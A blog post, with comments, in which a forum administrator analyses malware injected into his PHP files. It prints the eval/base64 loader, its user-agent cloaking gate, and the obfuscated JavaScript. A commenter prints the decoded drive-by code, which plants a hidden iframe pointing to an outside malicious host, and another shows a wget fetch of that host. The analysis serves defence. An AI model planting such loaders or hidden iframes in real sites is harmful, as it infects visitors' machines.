Monday, June 4, 2012

More about the forum virus

I got more time to investigate it.

I had a backup of the forum and wanted to make sure there were no changes to the files (besides that added file), so I ran an MD5 check. And it turned out the PHP files were changed.

At the beginning of index.php, the following line had been added (between PHP tags):

eval(base64_decode('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'));

When decoded, the first part is readable, but it contains yet another base64_decode layer:

error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android','chrome');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
    echo(base64_decode('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'));
}
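
As an added example (not the page's PHP or any code from the forum), here is the same user-agent gate in Python, with constructed client strings to show who is actually served the script: fetching from Linux, with Chrome, or as a crawler never yields the payload, while Windows Firefox and Internet Explorer do.

```python
# Added example (not the page's PHP): a Python mirror of the user-agent gate in
# the decoded PHP, so a defender can see which clients are ever served the
# injected script. BOTS_UA is the exact list from the page; the sample
# user-agent strings are constructed and not taken from the page.
BOTS_UA = [
    '12345', 'alexa.com', 'anonymouse.org', 'bdbrandprotect.com', 'blogpulse.com',
    'bot', 'buzztracker.com', 'crawl', 'docomo', 'drupal.org', 'feedtools',
    'htmldoc', 'httpclient', 'internetseer.com', 'linux', 'macintosh', 'mac os',
    'magent', 'mail.ru', 'mybloglog api', 'netcraft', 'openacoon.de', 'opera mini',
    'opera mobi', 'playstation', 'postrank.com', 'psp', 'rrrrrrrrr', 'rssreader',
    'slurp', 'snoopy', 'spider', 'spyder', 'szn-image-resizer', 'validator',
    'virus', 'vlc media player', 'webcollage', 'wordpress', 'x11', 'yandex',
    'iphone', 'android', 'chrome',
]

def matched_markers(user_agent, bots_ua=BOTS_UA):
    """Entries of the list found in the lower-cased UA; the PHP's
    strpos(strtolower($ua), $bs) !== false check is a plain substring test."""
    ua = user_agent.lower()
    return [bs for bs in bots_ua if bs in ua]

def serves_payload(user_agent, bots_ua=BOTS_UA):
    """True when the PHP would echo the base64 script to this visitor,
    i.e. when no marker matched and $bot stays FALSE."""
    return not matched_markers(user_agent, bots_ua)

# Constructed sample clients: the tools an analyst reaches for first, and the
# Windows desktop browsers the list conspicuously does not exclude.
SAMPLE_CLIENTS = {
    "curl":        "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0",
    "wget":        "Wget/1.13.4 (linux-gnu)",
    "googlebot":   "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "win_chrome":  "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.162 Safari/535.19",
    "win_firefox": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
    "win_ie8":     "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
}

def survey(clients=SAMPLE_CLIENTS):
    """Map each client name to whether it would receive the injected script."""
    return {name: serves_payload(ua) for name, ua in clients.items()}

if __name__ == "__main__":
    for name, ua in SAMPLE_CLIENTS.items():
        print(f"{name:12} payload={serves_payload(ua)!s:5} matched={matched_markers(ua)}")
```

This is why a curl or wget fetch from a Linux box shows a clean page; comparing the files on disk against a known-good backup, as done above, is the reliable check.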

That second part, once decoded, is unfortunately obfuscated JavaScript (enclosed in script tags):

i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;577!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} 
if(v&&e&&r&&z&&h&&s&&f&&v)e(s);

Indented:

i = 0;
try{
    avasv=prototype;
} catch (z) {
    h = "harCode";
    f = ['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');
    v = "e"+"va";
}

if (v) e = window[v+"l"];
try {
    q = document.createElement("div");
    q.appendChild(q+"");
} catch (qwg) {
    w = f;
    s = [];
}

r = String;
z = ((e)?h:"");
for( ;577!=i; i+=1) {
    j=i;
    if (e) s = s+r["fromC"+( (e) ? z : 12)](w[j]*1+42);
}
if (v && e && r && z && h && s && f && v) e(s);

It's not really clear. I get that he created a table with the split command ('f' is just a separator), but I don't know yet what that function does.
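
As an added example (not part of the original post), the loop can be reversed outside a browser: split on 'f', add 42 to each integer, and map each result to a character. The decoder below uses two excerpts copied from the array above; pass the whole quoted string to decode all 577 values.

```python
import re

# Added example, not code from the original post: a stand-alone decoder for the
# scheme used by the injected script. There, f = '<ints joined by "f">'.split('f')
# and the loop appends String.fromCharCode(w[j]*1 + 42) for j = 0..576, so the
# payload is a list of 577 signed integers, each shifted down by 42. The
# try { q.appendChild(q + "") } catch block always throws in a browser
# (appendChild rejects a string), which is what sets w = f.

def decode_shifted_charcodes(blob, sep="f", offset=42, limit=577):
    """Reverse the split/fromCharCode loop: split on `sep`, add `offset` to each
    integer and map it to a character. `limit` mirrors the loop bound 577."""
    tokens = blob.split(sep)[:limit]
    return "".join(chr(int(t) + offset) for t in tokens)

def extract_urls(text):
    """Pull http(s) URLs out of decoded script text for blocking / triage."""
    return sorted(set(re.findall(r"https?://[^\s'\"<>]+", text)))

# Two excerpts copied from the page's array (the full string is 577 values and
# is not repeated here): the opening of the script and the iframe URL.
OPENING = ("-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f"
           "74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81")
URL_PART = ("62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f"
            "75f73f5f21f61f69f19f8")

if __name__ == "__main__":
    print(repr(decode_shifted_charcodes(OPENING)))
    print(extract_urls(decode_shifted_charcodes(URL_PART)))
```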

On a side note, I still haven't got any news from the report I made (and I asked again a few days ago), so I think I can conclude that it's a shady business as I thought.

I'd like to thank everybody who has already helped me and given me tips on what to check on the server :)

10 comments:

  1. I've seen this before on some other sites. It's just another level of obfuscation. After it decodes, you get this: http://pastebin.com/2UNxtwqD
  2. You can find an explanation on this site

    http://stackoverflow.com/questions/10658071/site-was-just-attacked-and-javascript-was-injected-at-the-header-what-does-it-m
  3. Hi
    I am kcdtv
    It seems that your blog is right now under attack too.
    http://picturestack.com/896/20/WeUzIBH.jpg
    around 13h30
    Before your forum went down, a similar kind of warning was displayed.
    Sorry to be "bad news"; I sincerely hope I am mistaken.
    Anyway thanks for your great work.
    Bye.
    Replies
    1. No it's not, a friend of mine got the same message from his AV but it seems that it picks it up.

      This is posted as plain text so it's not gonna execute at all (unless you copy paste it in a PHP file and run it; and Blogspot doesn't allow custom PHP code).
    2. The reason why you get that message, is because this blog post contains exploit code.
  4. This guy decoded the "worm"
    http://stackoverflow.com/questions/10658071/site-was-just-attacked-and-javascript-was-injected-at-the-header-what-does-it-m/10658251#10658251
  5. The code
    for( ;577!=i; i+=1) {
    j=i;
    if (e) s = s+r["fromC"+( (e) ? z : 12)](w[j]*1+42);
    }

    basically converts to

    s = "";
    for (i = 0; 577 != i; i += 1) {
        s = s + String.fromCharCode(f[i]*1 + 42);  // f[i] is a string, so *1 forces a number before adding 42
    }

    Which results in the following code:

    if (document.getElementsByTagName('body')[0]) {
    iframer();
    } else {
    document.write("< i frame src='http://rjytkixbfjxkk.myfw.us/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'>");
    }

    function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src','http://rjytkixbfjxkk.myfw.us/?go=2');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
    }

    Here is Google's report on the site:

    http://www.google.com/safebrowsing/diagnostic?site=rjytkixbfjxkk.myfw.us

    I didn't want to go to the site to check what it actually does :-)

    Frank
  6. :) ..wget result is: The website rjytkixbfjxkk.myfw.us is (or was) utilizing the Sitelutions Redirection Engine. Unfortunately, the URL has been entered incorrectly, or the site has been deleted by its owner. Below are some of our other services and features that we offer..... ;)
  7. I tried to download the site code with wget doing:

    wget http://rjytkixbfjxkk.myfw.us/?go=2

    But the only thing I get is an HTML page saying that the page was removed or the address was entered incorrectly. So I suppose that no more can be achieved that way. Sorry.
  8. I see this shit all the time, I have a copy of the binaries they distribute via the pdf/swf/java/js 'payloads' similar to yours. Also check out the site jsunpack.jeek.org, you have to hand feed it sometimes, when they do stuff like "Ma"+"th", but it's pretty decent. If you want, send officer an email at the domain militia dot cc. I doubt they targeted you intentionally. Just a generic "WordPress driveby".